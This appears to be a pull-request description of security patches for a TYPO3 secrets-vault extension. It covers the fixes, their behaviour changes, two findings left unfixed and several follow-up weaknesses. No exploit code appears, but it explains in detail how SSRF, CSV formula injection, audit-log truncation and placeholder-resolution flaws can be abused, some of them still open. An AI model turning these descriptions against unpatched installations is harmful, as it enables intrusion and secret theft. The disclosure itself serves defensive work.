Every patch was developed against that exact commit in an isolated workspace and then put through an independent verifier, which reviewed the staged diff, ran the project's suites and had to state three things with confidence: the change is targeted, it introduces no new weakness, and it does not change behaviour beyond closing the finding. Each surviving diff was then handed to a fresh reviewer whose only question was "what can an attacker do with this change that they could not do before?". Four patches were rejected on the first attempt and rebuilt; two findings never earned a fix and were dropped rather than shipped.

## What is fixed

**Secrets stored in cleartext (HIGH)** — `FlexFormVaultHook` resolved the FlexForm data structure with an empty table name, an empty field name and the submitted array where the record row belongs. That throws on both v13 and v14, the exception was swallowed, and the editor's plaintext fell through to DataHandler and into the record XML: every secret entered into a `vaultSecret` FlexForm field was stored unencrypted, with no vault ACL and no audit entry. The lookup now passes the real table, field, record row and (on v14) the `TcaSchema`, and fails closed when the structure cannot be resolved.

**Frontend authorization** — three commits close one defect seen from three angles. `AccessControlService::hasAccess()` inferred "frontend" from the *absence* of `$GLOBALS['BE_USER']`, which TYPO3 populates for any visitor carrying a backend session; it now decides from the request's application type. The TypoScript listener additionally goes through a `retrieveForFrontend()` that requires `frontend_accessible` for every caller. Before this, an editor could put a placeholder for a secret they cannot read into a published page, ask an admin to review it in the frontend, and the decrypted value went into the shared page cache and out to anonymous visitors.

**SSRF filter bypass on redirects** — the `ssrf-dns-pin` middleware returned "allowed, nothing to pin" for canonical IP literals, trusting a caller-side check that redirect hops never pass, so a `302` to `169.254.169.254` reached cloud metadata. The literal branch now applies the dangerous-IP check itself, honouring the `allowed_hosts` opt-in on every hop.

**Audit-log integrity and hygiene** — an unbounded `X-Request-Id` went into a `varchar(100)` column while the HMAC covered the untruncated value, which either aborted the audit write or left a row permanently disagreeing with its own hash; values are now normalised to the column width upstream of both the INSERT and the hash. Both CSV exports (backend module and `vault:audit --export`) emitted rows with the proprietary `fputcsv` escape, letting an attacker-controlled field close its own cell and synthesize a formula cell past `CsvFormulaSanitizer`; both now emit strict RFC-4180.

**Backend information disclosure and enforcement** — vault exception text was echoed to editors through two channels (the flash message and the `DataHandler::log()` detail, which core replays to the same user), giving an existence oracle for secrets outside the editor's ACL; failures now report a generic message plus a correlation reference, with the cause logged server-side. And the TSconfig `edit` / `readOnly` field permissions, previously enforced only as a `readonly` attribute in the rendered form, are now re-checked on the write path.

## Behaviour changes worth a decision

- **F1** trades availability for confidentiality: if a FlexForm data structure genuinely cannot be resolved, a newly entered secret is discarded with an error rather than saved in cleartext.
- **F4/F7** stop resolving non-`frontend_accessible` secrets during a frontend request even for a privileged viewer; such placeholders now render literally. Frontend write and delete are refused outright.
- **F8** records an over-length `X-Request-Id` or `User-Agent` clipped, where the write previously failed. Nothing marks that a clip occurred.
- **F9** means an editor no longer sees *why* a vault operation failed — only that it did, and which reference to quote to an administrator.
- **F10** silently discards nothing: a denied write is dropped from the datamap and surfaced to the editor, and the stored secret is untouched.

## Not fixed

**F2 — the audit hash chain cannot detect tail truncation or a wipe.** Deleting the newest rows, or all of them, leaves a self-consistent chain that `vault:audit --verify`, the backend "Verify Chain" button and the pre-rotation gate all report as valid. Two fixes were built and both were rejected: storing the extent anchor in `sys_registry` put a raw `unserialize()` of attacker-writable rows on a path reachable from an unauthenticated page render, and a dedicated anchor table fixed that but reported false tamper alarms whenever an audit row was appended between the verification's row walk and its anchor read — which would block master-key rotation — and left a window before `database:updateschema` in which a secret write persisted with no audit row. The finding stands; `CLAUDE-SECURITY-.../patches/F2.md` carries both defects and a concrete design for a third attempt.

**F5 — placeholder resolution reaches editor content.** The listener substitutes `%vault(...)%` in the output of every stdWrap call, so an editor-controlled field or a reflected request parameter is a resolution site. An opt-in stdWrap property broke a documented integrator configuration silently; requiring the identifier to appear in the request's TypoScript setup preserved the documented usages but stopped resolving legitimate placeholders produced by a userFunc, DataProcessor or Fluid template, and added an unbounded log-write path reachable by unauthenticated input. Note that F4 and F7, both included here, close the privileged-viewer half of this exposure; what remains is the reach of resolution into content. Details in `patches/F5.md`.

## Follow-ups the reviews surfaced (not addressed here)

- `Documentation/Developer/Adr/ADR-005-AccessControl.rst` and `ADR-029` document the access decision order that F7 changes; reordering an accepted ADR is the owner's call.
- `AccessControlService::canCreate()` and the actor-attribution methods still read the ambient backend user, so a frontend read granted purely by the `frontend_accessible` gate is still audited as a backend actor.
- `SecretsController` logs a raw POST-supplied identifier into the audit log, which reaches the console CSV path; `CsvFormulaSanitizer::escapeField()` quotes on `,` and `"` but not on a bare `CR`.
- `CsvFormulaSanitizer` inspects only the first byte of each field, so a `;` inside a value can still yield a second cell beginning with `=` for a spreadsheet whose list separator is `;`.
- Pending secrets are persisted from the hook's own state rather than from `$fieldArray`, so a field core drops for `exclude` permissions is still rotated.
- In the FlexForm clear branch, an editor without vault read access saving an untouched record wipes the record's binding to the secret (the secret itself survives, blocked by the ACL).

## Verification

Suites were run on the combined branch, not only on the individual patches. After rebasing onto v0.13.0: unit 2193 tests with no failures, php-cs-fixer and Rector clean, PHPStan output identical to unmodified `main`, and the functional suite's failing set unchanged from base locally (`TcaIntegrationTest` ×6, `OAuthIntegrationTest` ×5 — needs the mock-oauth sidecar — and `AuditLogServiceTest` ×2, all failing on `main` as well; CI runs SQLite, where they pass).

CI caught one thing the local run could not: two of the FlexForm fail-closed tests pointed the TCA at a missing data-structure file, and TYPO3 v13.4 resolves FlexForm data structures while building the TCA schema, so both errored across the whole v13 matrix. They now use a data structure that parses and declares the field as a plain input, reaching the same fail-closed strip on both majors — and still failing against the unpatched hook.

Note on F6's practical reach: Guzzle's PSR-18 `sendRequest()` hard-codes redirects off, so the extension's own two send paths do not follow redirects today. The fix is correct hardening for any caller using the exposed client differently, not a live exploit through `VaultHttpClient`.

The full report, the per-finding patch files and the decline notes are in `CLAUDE-SECURITY-20260729-192604/` (gitignored, not part of this branch).
